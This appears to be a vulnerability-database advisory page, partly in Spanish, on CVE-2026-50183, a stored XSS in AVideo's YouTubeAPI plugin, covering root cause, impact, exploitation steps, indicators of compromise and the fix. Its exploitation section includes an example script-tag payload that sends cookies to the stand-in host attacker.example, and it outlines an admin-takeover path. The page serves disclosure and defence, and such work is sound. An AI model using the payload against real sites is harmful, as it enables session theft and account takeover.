CVE-2026-50183
PHP Análisis y mitigación de vulnerabilidades

Vista general

CVE-2026-50183 is a stored Cross-Site Scripting (XSS) vulnerability in the AVideo YouTubeAPI plugin (WWBN/AVideo) that allows any YouTube video uploader to inject malicious JavaScript into the AVideo homepage gallery by setting a hostile video title. The vulnerability affects AVideo versions ≤ 29.0 and was published on May 28, 2026, with the GitHub Advisory Database entry updated on June 4, 2026. It carries a CVSS v3.1 base score of 4.7 (Moderate) (GitHub Advisory).

Técnicas

The root cause is CWE-79 (Stored XSS) chained with CWE-829 (Inclusion of Functionality from Untrusted Control Sphere): plugin/YouTubeAPI/YouTubeAPI.php::listVideos() fetches the snippet.title field from the YouTube Data API and stores it in a YPTvideoObject without sanitization, treating uploader-controlled content as trusted. plugin/YouTubeAPI/gallerySection.php then reflects the title into four HTML contexts in each gallery card — three with no encoding whatsoever, and one with only a partial str_replace('"', '', $youtubeTitle) mitigation that strips double quotes from a single attribute but leaves the other three sinks unprotected. The most dangerous sink (line 60) renders the title directly into the DOM as a live <script> element, causing synchronous JavaScript execution. AVideo's response caching (default cacheTimeout of 3600 seconds) means the malicious payload persists even after the hostile video title is changed or removed on YouTube (GitHub Advisory, AVideo Security Advisory).

Impacto

Every visitor who loads any AVideo page rendering the YouTubeAPI gallery section is affected: the injected JavaScript executes in the visitor's browser session under the AVideo origin, enabling theft of non-HttpOnly cookies and issuance of authenticated requests on behalf of the victim. When the victim is an AVideo administrator, the payload can perform any admin action available via cookie-based authentication — including creating users, escalating privileges, modifying configuration, or installing plugins — effectively enabling full administrative takeover of the AVideo instance. The payload's persistence through the cache window (up to one hour by default) means it continues to affect users even after the malicious YouTube video is removed (GitHub Advisory).

Pasos de explotación

  1. Reconnaissance: Identify AVideo instances with the YouTubeAPI plugin enabled and showGallerySection=true (both are defaults after a YouTube Data API key is configured). Enumerate the operator's configured keyword/search query by observing the gallery content on the AVideo homepage.
  2. Create hostile YouTube video: Using any free YouTube account, upload a video and set its title to a JavaScript payload, e.g., <script>document.location='https://attacker.example/steal?c='+document.cookie</script>.
  3. Arrange query match: Ensure the hostile video appears in the AVideo operator's configured YouTube search results by including the operator's keyword phrase in the video's title, description, or by targeting a channel the operator follows.
  4. Wait for cache expiry: Wait up to 3600 seconds (default cacheTimeout) for AVideo's cached YouTube response to expire and a fresh listVideos() call to fetch the malicious title.
  5. Payload delivery: When any visitor (or administrator) loads the AVideo homepage or any page rendering the gallery section, the unencoded title is injected into the DOM as a live <script> element and executes synchronously in the victim's browser.
  6. Achieve objective: Collect stolen session cookies for account takeover, or — if the victim is an admin — issue authenticated admin API requests to create a backdoor account or install a malicious plugin (AVideo Security Advisory).

Indicadores de compromiso

  • Network: Outbound requests from visitor browsers to unexpected external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from AVideo gallery page loads; unusual JavaScript-initiated POST requests to AVideo admin endpoints from non-admin user sessions.
  • Logs: AVideo web server access logs showing repeated requests to the homepage or gallery-rendering pages from diverse IPs shortly after a new YouTube video matching the configured query was indexed; YouTube Data API cache refresh events (listVideos() calls) coinciding with introduction of a new video with anomalous title characters (<, >, script).
  • File System: Unexpected new admin accounts or configuration changes in the AVideo database following gallery page loads; modified plugin files if an attacker leveraged admin takeover to install a malicious plugin.
  • Process/Application: AVideo cache files (stored for cacheTimeout seconds) containing raw HTML/JavaScript in the snippet.title field of cached YouTube API responses (AVideo Security Advisory).

Mitigación y soluciones alternativas

The fix was committed to the WWBN/AVideo repository (commit 7292129) and applies htmlspecialchars($video->title, ENT_QUOTES | ENT_HTML5, 'UTF-8') and equivalent encoding to the thumbnail URL before rendering in gallerySection.php, neutralizing all four injection sinks. As of the advisory publication, no patched release version was formally tagged (affected versions listed as ≤ 29.0 with "Patched versions: None" in the advisory), so operators should update to the latest master branch commit or apply the patch manually. As an interim workaround, disable the YouTubeAPI plugin or set showGallerySection=false in the plugin configuration, and manually flush the AVideo YouTube response cache to remove any already-cached malicious titles (AVideo Patch Commit, GitHub Advisory).

Reacciones de la comunidad

The vulnerability was reported by security researcher arkmarta and published by AVideo maintainer DanielnetoDotCom via GitHub's coordinated disclosure process on May 28, 2026. No significant broader media coverage or notable social media commentary beyond the GitHub advisory and GitLab advisory mirror has been identified (GitHub Advisory).

Recursos adicionales


FuenteEste informe se generó utilizando IA

Relacionado PHP Vulnerabilidades:

CVE ID

Severidad

Puntuación

Tecnologías

Nombre del componente

Exploit de CISA KEV

Tiene arreglo

Fecha de publicación

CVE-2026-54458CRITICAL9.6
  • PHP logoPHP
  • wwbn/avideo
NoNoJul 15, 2026
CVE-2026-49279HIGH7.7
  • PHP logoPHP
  • wwbn/avideo
NoNoJul 15, 2026
GHSA-xg43-5579-qw6vMEDIUM6.5
  • PHP logoPHP
  • adawolfa/isdoc
NoJul 15, 2026
CVE-2026-50182MEDIUM6.1
  • PHP logoPHP
  • wwbn/avideo
NoNoJul 15, 2026
CVE-2026-50183MEDIUM4.7
  • PHP logoPHP
  • wwbn/avideo
NoNoJul 15, 2026

Evaluación gratuita de vulnerabilidades

Compare su postura de seguridad en la nube

Evalúe sus prácticas de seguridad en la nube en 9 dominios de seguridad para comparar su nivel de riesgo e identificar brechas en sus defensas.

Solicitar evaluación

Recursos adicionales de Wiz

Obtén una demostración personalizada

¿Listo para ver a Wiz en acción?

"La mejor experiencia de usuario que he visto en mi vida, proporciona una visibilidad completa de las cargas de trabajo en la nube."
David EstlickCISO
"Wiz proporciona un panel único para ver lo que ocurre en nuestros entornos en la nube."
Adam FletcherJefe de Seguridad
"Sabemos que si Wiz identifica algo como crítico, en realidad lo es."
Greg PoniatowskiJefe de Gestión de Amenazas y Vulnerabilidades